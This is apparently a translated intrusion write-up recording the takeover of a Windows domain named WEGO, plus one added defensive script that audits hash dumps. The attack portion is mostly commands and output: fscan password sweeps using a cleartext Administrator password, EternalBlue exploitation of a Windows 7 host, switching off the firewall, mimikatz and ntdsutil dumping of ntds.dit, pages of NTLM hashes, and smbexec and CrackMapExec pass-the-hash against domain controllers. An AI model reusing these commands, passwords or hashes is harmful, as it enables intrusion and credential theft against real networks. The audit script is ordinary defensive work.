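# ---- frpc.ini (target host) ----
[common]
server_addr = 1.1.1.1
server_port = 7000
token = <long-random-shared-secret>   # same value as on the server

[socks5]
type = tcp
remote_port = 60000
plugin = socks5
plugin_user = <socks-user>            # SOCKS5 authentication on the exposed port
plugin_passwd = <socks-password>
use_encryption = true                 # encrypt the frpc<->frps channel
use_compression = true
```

With the token set, a stray frpc without it is rejected at registration; with plugin_user/plugin_passwd set, Proxifier needs the same credentials, and an opportunistic scanner that hits 60000 sees only an authentication failure. Binding the dashboard to 127.0.0.1 and tunnelling to it over SSH removes the "good/good" login from the internet entirely.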

Taking the domain controllers

Credential check against port 445 across the subnet

Validate the recovered Administrator password against every host with 445 open (fscan's -np skips the ping probe):

fscan  -h 10.10.10.5 -p 445 -user Administrator -pwd jo6ek6vul3vm,6 -domain WEGO -np

Run locally through the SOCKS proxy, from the fscan source tree (the command as captured names a single host, while the results clearly come from a sweep of the /24):

go run main.go -h 10.10.10.5 -p 445 -np -user Administrator -pwd jo6ek6vul3vm,6 -domain
SMB:10.10.10.3:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.41:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.19:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.20:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.126:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.154:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.4:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.1:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.6:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.2:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.100:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.42:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.10:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.5:445:Administrator jo6ek6vul3vm,6 WEGO

The domain Administrator password is accepted over SMB by all three domain controllers (10.10.10.2, .3 and .4) and by a dozen member hosts, so the domain is effectively owned at this point. Alternatively, Ladon from the beacon can sweep the /24 for MS17-010 and inventory hosts at the same time:

beacon> Ladon 10.10.10.8/24 MS17010
[+] host called home, sent: 1036383 bytes
[+] received output:
Ladon 7.0
Start: 2020-12-04 17:29:22
Runtime: .net 4.0  OS Arch: x64
OS Name: Microsoft Windows Server 2012 R2 Standard
10.10.10.8/24
load MS17010
10.10.10.8/24 is Valid CIDR
IPCound: 256
Scan Start: 2020-12-04 17:29:22
10.10.10.1 MAIL xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.48 neweclient.xx.xx.x x.xx
10.10.10.34 workpc2019.xx.xx.x x.xx
10.10.10.20 FILES2 xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.19 FILES2 xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.5 DATABASE xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.42 account-7.xx.xx.x x.xx
10.10.10.46 account3050.xx.xx.x x.xx
10.10.10.38 dell7020b-36.xx.xx.x x.xx
10.10.10.8 WIN-XF2DOSIWBRF  [Win (R) 2008 Standard 6003 SP 2]
10.10.10.6 FILES xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.9 WIN-XF2DOSIWBRF  [Win (R) 2008 Standard 6003 SP 2]
10.10.10.4 AD3 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.17 CDTOWER17 xx.xx.x x.xx [??渀?漀?猀??攀?瘀攀???刀???  ???琀愀渀?愀????  ???攀?瘀?挀攀?倀愀挀欀??]
10.10.10.2 AD1 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.39 ASUS-500G4-PC xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.41 MS17-010 PCSCRIBE-7 xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.3 AD2 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.45 KG-JOOMLA  [Win 2008 R2 Standard 7601 SP 1]
10.10.10.35 2014JUINYIHWIN7  [Win 7 Professional 7601 SP 1]
10.10.10.22 ACADEMIC xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.100 CARD100  [Win 7 Professional 7601 SP 1]
10.10.10.90 DFL-FILES2017  [Win 6.1]

[+] received output:
10.10.10.10 MEDIA-DOME  [Win 6.1]

[+] received output:
10.10.10.59 school-3070.xx.xx.x x.xx

[+] received output:
10.10.10.115 3060-1e.xx.xx.x x.xx
10.10.10.126 3060-2f.xx.xx.x x.xx
10.10.10.142 win104b.xx.xx.x x.xx
10.10.10.154 3060-5d.xx.xx.x x.xx

[+] received output:
=============================================
OnlinePC:34
Cidr Scan Finished!
End: 2020-12-04 17:30:06

Try logging in to the domain controller over 3389.

Batch scan for MS17-010

10.10.10.41 MS17-010 PCSCRIBE-7 xx.xx.x x.xx [Win 7 Professional 7601 SP 1]

The .41 host is vulnerable.

check.bat IP
ms17010.bat IP + OS version
go.bat IP + architecture
C:\Users\good>cd C:\Users\good\Desktop\nw\ms17-010\

C:\Users\good\Desktop\nw\ms17-010>check.bat 10.10.10.41
[+] SMB Touch started

[*] TargetIp              10.10.10.41
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 6.1 build 7601
    Windows 7 Professional 7601 Service Pack 1

[*] Trying pipes...
        [-] spoolss    - Not accessible (0xC0000022 - NtErrorAccessDenied)
        [-] browser    - Not accessible (0xC0000022 - NtErrorAccessDenied)
        [-] lsarpc     - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Not Vulnerable]
        ETERNALROMANCE  - Named pipe required for exploit

[Vulnerable]
        ETERNALBLUE     - DANE
        ETERNALCHAMPION - DANE

[*] Writing output parameters

[+] Target is vulnerable to 2 exploits
[+] Touch completed successfully


C:\Users\good\Desktop\nw\ms17-010>MS17-010_.bat 10.10.10.41
[*] MS17-010 Exploit // lu4n.com
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 01                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000

C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 64
Architecture: 64 is not a valid value.

Architecture: 64 is not a valid value.

^C终止批处理操作吗(Y/N)? y

C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 x64
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
    SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
    Target OS is: 7 x86
    Target SP is: 1
        [+] Backdoor installed
        [-] DLL Architecture is: 64 bit
Error sending wrong architecture DLL to target
        [-] DLL NOT built
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
    SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
    Target OS is: 7 x86
    Target SP is: 1
        [+] Backdoor installed
        [-] DLL Architecture is: 64 bit
Error sending wrong architecture DLL to target
        [-] DLL NOT built

C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 x86
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
    SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
    Target OS is: 7 x86
    Target SP is: 1
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully

Exploit it with the tool

C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.

Got onto the target machine. I originally planned to use an hta to pop another beacon back to CS, but it would not work after several tries.

Logging in to 3389 with the password failed even though 3389 was definitely open, so the firewall was turned off here.

good14 beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:

介面: 10.10.10.2 --- 0xc

Connected successfully. Once on the box I found antivirus installed; whitelist the beacon or add the C: drive as a trusted location.

Took .3, .2, .4 and .41 the same way.

Lateral movement

beacon> shell C:\Windows\TAPI\f.exe -h 10.10.11.1/24 -pwdf C:\Windows\TAPI\pass.txt -user Administrator -domain WEGO -o C:\Windows\TAPI\1.txt
[+] received output:
10.10.11.99  (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]10.10.11.8
   [->]Win7x64Pro
   [->]10.10.11.8
NetInfo:
[*]10.10.11.99
   [->]backuwego
   [->]10.10.11.99
   [->]10.30.10.199
NetInfo:
[*]10.10.11.6
   [->]stufiles
   [->]10.10.11.6
10.10.11.8  (Windows 7 Professional 7601 Service Pack 1)
WebTitle:http://10.10.11.6:80 403 IIS 8.0 閰喟敦�航炊 - 403.14 - Forbidden
NetInfo:
[*]10.10.11.7
   [->]digireadweb
   [->]10.10.11.7
10.10.11.7  (Windows Server (R) 2008 Standard 6003 Service Pack 2)
WebTitle:http://10.10.11.95:443 400 400 Bad Request
WebTitle:http://10.10.11.95:80 200 None
SMB:10.10.11.6:445:WEGO\Administrator jo6ek6vul3vm,6
WebTitle:http://10.10.11.14:80 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.15:80 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.14:443 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.15:443 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.16:443 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.16:80 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.10:80 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.10:443 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.7:80 200 �����梯��訾�撠���-嚚��梯��扳��霈�嚚�
WebTitle:https://10.10.11.95:443 200 None

[+] received output:
WebTitle:https://10.10.11.77:443 200 Vigor 登入页面
WebTitle:http://10.10.11.77:80 200 Vigor 登入页面
WebTitle:https://10.10.11.254:443 200 Vigor Login Page
WebTitle:https://10.10.11.20:443 200 Vigor 登入页面
WebTitle:http://10.10.11.254:80 200 Vigor Login Page
WebTitle:https://10.10.11.80:443 200  CN8000A - Cover

[+] received output:
scan end
beacon> shell C:\Windows\TAPI\f.exe -h 10.10.11.1/24 -pwdf C:\Windows\TAPI\pass.txt -user Administrator -domain WEGO -o C:\Windows\TAPI\1.txt -p 445 -m smb
icmp alive hosts len is: 21
10.10.11.7:445 open
10.10.11.8:445 open
10.10.11.6:445 open
10.10.11.99:445 open
SMB:10.10.11.6:445:WEGO\Administrator jo6ek6vul3vm,6

Use fscan to scan for more detail

beacon> shell c:\Windows\TAPI\mimikatz.exe ""privilege::debug"" ""lsadump::lsa /patch full"" exit >>c:\Windows\TAPI\log1.txt

Take a look at the SMB service scan

RID  : 00000e07 (3591)
User : ws4311
LM   : 54191cf4166bc549aad3b435b51404ee
NTLM : 4790310f070043b5d1709a30aede1a27

RID  : 00000e08 (3592)
User : ws4312
LM   : 03b93594f7afee8caad3b435b51404ee
NTLM : 5dab331d3681f85c85503c9437cfc03b

RID  : 00000e09 (3593)
User : ws4313
LM   : d4cb20e652df2393aad3b435b51404ee
NTLM : b6a56cab9d2568151015094e90cbd21d

RID  : 00000e0a (3594)
User : ws4314
LM   : 687ac937560351a6aad3b435b51404ee
NTLM : d7a7fca890e9f3c1d435bd5fc0caf327

RID  : 00000e0b (3595)
User : ws4315
LM   : 0a19188cf464dda2aad3b435b51404ee
NTLM : 6f748524eda9a94cb30dd323695b092e

RID  : 00000e0c (3596)
User : ws4316
LM   : 7784d6e4bdf4f440aad3b435b51404ee
NTLM : 3cb0a4c08952437b6311db01eedd3c45

There are a lot of machines, so try pass-the-hash.

Log in to the domain controller 10.2 over 3389 and use mimikatz to grab all the hashes in the domain.

C:\Windows\system32>ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil: snapshot
快照: activate instance ntds
使用中执行个体已设定为 "ntds"。
快照: create
正在建立快照...
快照集 {1dc812ae-3ae6-475b-bb67-ccafe028ae69} 已经成功产生。
快照: quit
ntdsutil: quit

C:\Windows\system32>ntdsutil snapshot "mount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}" quit quit
ntdsutil: snapshot
快照: mount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已挂接为 C:\$SNAP_202012062103_VOLUMEC$\
快照: quit
ntdsutil: quit

C:\Windows\system32>copy C:\$SNAP_202012062103_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit
复制了         1 个档案。
C:\Windows\system32>

Finally, delete the snapshot

C:\Windows\system32>ntdsutil snapshot "unmount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}" quit quit
ntdsutil: snapshot
快照: unmount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已卸載。
快照: quit
ntdsutil: quit

C:\Windows\system32>ntdsutil snapshot "delete  {1dc812ae-3ae6-475b-bb67-ccafe028ae69}" quit quit
ntdsutil: snapshot
快照: delete  {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已經刪除。
快照: quit
ntdsutil: quit

C:\Windows\system32>

Or use the CS plugin

C:\Windows\system32>reg save hklm\sam sam.hiv

There are a lot of passwords; only a portion is shown here.

Dump the domain members' hashes

To collect every password on the system, the information stored in the SAM database also has to be extracted, which yields the hashes of all local users on the current system.

C:\Windows\system32>reg save hklm\sam sam.hiv

Export sam and system:

➜  Public python3 1.py -ntds ntds.dit -system system.hiv LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xaf91815108821533b8b5c1365be697c1
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: e28acd8770d422291bab9e2a9f8901d4
[*] Reading and decrypting hashes from ntds.dit
AD2$:15142:aad3b435b51404eeaad3b435b51404ee:ef72a0d5642a9234a14daf517e4a9ccc:::
AD3-OLD$:16625:aad3b435b51404eeaad3b435b51404ee:ef5035822b6ada38890c81bced3e7427:::
AD1$:16630:aad3b435b51404eeaad3b435b51404ee:216f5e93e84c580d8c7d54995b82f35d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TsInternetUser:1000:22c206eac925d8cb606c5c8235eade10:65b4ce0675d0bb69277b75712e409528:::
IUSR_MAIL:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IWAM_MAIL:1005:a7aa223e7443a354630461ad9692aa95:0792a2872e4c3fe838d2d35a985e4e6f:::
Administrator:500:e74b5db312ea77404726d0d0bb05c458:a9398c8a95dbe6801f280d2cfb9c76de:::

The operation completed successfully.
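Reading a dump in the `domain\uid:rid:lmhash:nthash:::` format shown above from the defender's side: this is an added example, not code from the original write-up or from impacket, and the sample lines it parses are constructed. It reports what a domain owner should fix after such a dump: accounts that still store an LM hash, accounts with an empty NT hash, and NT hashes shared by several accounts (password reuse, which is exactly what makes pass-the-hash spread so quickly).

```python
"""Audit a secretsdump-style NTDS hash dump for weak credential hygiene.

Added example, not part of the original write-up and not impacket code.
Input format (one account per line): domain\\uid:rid:lmhash:nthash:::
"""
import re
from collections import defaultdict

# Well-known hashes of the empty password (LM and NT respectively).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample dump: the hex values are placeholders, not real hashes.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
AD1$:16630:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1100:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
helpdesk:1101:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
legacy_user:1102:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:89abcdef0123456789abcdef01234567:::
"""


def parse_dump(text):
    """Return (user, rid, lm, nt) tuples; banner and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return rows


def audit(rows):
    """Classify parsed rows into the findings a defender should act on."""
    findings = {"lm_present": [], "empty_nt": [], "reused_nt": {}}
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in rows:
        # An LM hash means LM storage is still enabled (or the password predates
        # the policy change); LM is trivially crackable.
        if lm != EMPTY_LM:
            findings["lm_present"].append(user)
        # Empty NT hash: no password set (normal only for disabled accounts like Guest).
        if nt == EMPTY_NT:
            findings["empty_nt"].append(user)
        # Reuse check covers user accounts only; machine accounts ($) have random passwords.
        if not user.endswith("$") and nt != EMPTY_NT:
            by_nt[nt].append(user)
    findings["reused_nt"] = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return findings


def report(findings):
    """Render findings as plain lines for a ticket or a console."""
    lines = [f"LM hash present: {', '.join(findings['lm_present']) or 'none'}",
             f"Empty NT hash:   {', '.join(findings['empty_nt']) or 'none'}"]
    for nt, users in findings["reused_nt"].items():
        lines.append(f"NT hash {nt[:8]}... shared by: {', '.join(users)}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(audit(parse_dump(SAMPLE_DUMP)))))
```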

smbexec.py -hashes :<hash> domain/domainuser@192.168.10.2

Use secretsdump.py locally to dump the hashes

➜  Downloads python3 smbexec.py [email protected] -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

➜  NW python3 smbexec.py [email protected] -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
➜  NW python3 smbexec.py [email protected] -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\WINDOWS\system32>

Pass-the-hash and IPC-based lateral movement

PTH is still built on top of an IPC remote connection.

smbexec executes commands on the remote system through its file shares (admin$, c$, ipc$, d$).

The target must have port 445 open and the C$ share available.


Using the hashes we grabbed from the domain controller above, each IP has to be matched to its hostname and hash before smbexec can be used; here the mapping for AD3 was identified.


Next, try 3389 and the rest, drop an implant, and call back to CS.

Pass-the-hash with CrackMapExec:

SMB         10.10.10.5      445    DATABASE         [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.88     445    NONE             [*] FXNICOS 0.1 (name:) (domain:) (signing:False) (SMBv1:True)
SMB         10.10.10.100    445    CARD100          [*] Windows 7 Professional 7601 Service Pack 1 (name:CARD100) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB         10.10.10.2      445    AD1              [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.20     445    FILES2           [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.101    445    PERSONNEL-3060   [*] Windows 10.0 Build 17134 x64 (name:PERSONNEL-3060) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:False)
SMB         10.10.10.19     445    FILES2           [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.22     445    ACADEMIC         [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.103    445    LIB-3020-83      [*] Windows 7 Professional 7601 Service Pack 1 (name:LIB-3020-83) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB         10.10.10.3      445    AD2              [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.4      445    AD3              [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB         10.10.10.39     445    ASUS-500G4-PC    [-] xx.xx.x x.xx\administrator:a9398c8a95dbe6801f280d2cfb9c76de STATUS_NETLOGON_NOT_STARTED

Note that this tool shows the mapping between host IP and username; combined with the hash file obtained earlier (1.txt.ntds), the username, host IP and user hash can be put together. A portion is shown here.

STPC-37$:7840:aad3b435b51404eeaad3b435b51404ee:24eaa29232d5eab4d560f748bc4649b4:::
STPC-33$:7847:aad3b435b51404eeaad3b435b51404ee:6ca428fed76b726f1656f3606cb0b2c9:::
STPC-16$:7819:aad3b435b51404eeaad3b435b51404ee:ca8ff27d7b093aff95922a0b88e77f5c:::

Then try them one by one with smbexec.py.

There is also the 10.10.11.x segment; I am still too green for it and will come back to it after studying more.

A quick look shows web services, FTP and so on.

Here is a recommended intranet scanner written by a fellow researcher:

https://github.com/shadow1ng/fscan

Recommended reading

* EW: a record of an intranet intrusion and penetration test